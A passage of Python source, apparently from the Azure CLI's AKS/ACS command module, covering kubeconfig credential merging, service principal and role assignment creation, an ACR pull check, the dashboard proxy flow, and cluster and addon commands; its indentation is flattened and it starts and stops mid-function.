if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
result = client.create(app_create_param, raw=True)
return result.output, result.response.headers["ocp-aad-session-key"]
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(
reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cmd,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cmd, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import get_sdk
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(
resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = assignee
if resolve_assignee:
from azure.graphrbac.models import GraphErrorException
error_msg = "Failed to resolve service principal object ID: "
try:
object_id = _resolve_object_id(cmd.cli_ctx, assignee)
except GraphErrorException as ex:
if ex.response is not None:
error_code = getattr(ex.response, "status_code", None)
error_reason = getattr(ex.response, "reason", None)
internal_error = ""
if error_code:
internal_error += str(error_code)
if error_reason:
if internal_error:
internal_error += " - "
internal_error += str(error_reason)
if internal_error:
error_msg += "({}) ".format(internal_error)
error_msg += ex.message
# this should be UserFault or ServiceError, but it is meaningless to distinguish them here
raise CLIError(error_msg)
except Exception as ex: # pylint: disable=bare-except
raise CLIError(error_msg + str(ex))
assignment_name = uuid.uuid4()
custom_headers = None
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
parameters = RoleAssignmentCreateParameters(
role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentProperties', mod='models',
operation_group='role_assignments')
properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cmd, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cmd.cli_ctx, scope)
assignments_client = factory.role_assignments
if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
return_msg = None
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning(
"There is a known issue for Kubernetes versions < 1.17.14 when connecting to "
"ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for"
"more information."
)
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
"--namespace=default",
]
# Support kubectl versons < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
if output:
print(output)
# only return the output in test case "test_aks_create_attach_acr"
test_hook_data = get_cmd_test_hook_data("test_aks_create_attach_acr.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("returnOutput", False):
return_msg = output
else:
raise AzureInternalError("Failed to check the ACR.")
finally:
os.close(fd)
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise FileOperationError('Can not find kubectl executable in PATH')
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--output",
"name",
"--selector",
"k8s-app=kubernetes-dashboard",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--selector",
"k8s-app=kubernetes-dashboard",
"--output",
"jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
# output format: "'{port}'"
dashboard_port = int((dashboard_port.replace("'", "")))
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post(
"http://localhost:8888/openLink/{0}".format(term_id),
json={"url": dashboardURL},
)
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("enableTimeout", False):
timeout = test_configs.get("timeoutInterval", None)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(
[
"kubectl",
"--kubeconfig",
browse_path,
"proxy",
"--address",
listen_address,
"--port",
listen_port,
],
universal_newlines=True,
stderr=subprocess.STDOUT,
timeout=timeout,
)
except subprocess.CalledProcessError as err:
if err.output.find('unknown flag: --address'):
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.CalledProcessError as new_err:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
new_err, new_err.output
)
)
else:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
err, err.output
)
)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
finally:
os.close(fd)
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
auto_upgrade_channel=None,
enable_addons=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
disable_public_fqdn=False,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
disable_local_accounts=False,
enable_fips_image=False,
no_wait=False,
yes=False,
enable_azure_rbac=False,
aks_custom_headers=None,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
snapshot_id=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from .decorator import AKSCreateDecorator
aks_create_decorator = AKSCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_default_mc_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc(mc)
# pylint: disable=line-too-long
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
# pylint: disable=line-too-long
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False,
enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = False
if instance.service_principal_profile.client_id == "msi":
msi_auth = True
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation,
rotation_poll_interval=rotation_poll_interval,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if msi_auth:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
aad_route=True,
create_dcr=True,
create_dcra=True)
else:
raise ArgumentUsageError(
"--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
# For monitoring addon, Metrics role assignement doesnt require in case of MSI auth
if enable_monitoring and not enable_msi_auth_for_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
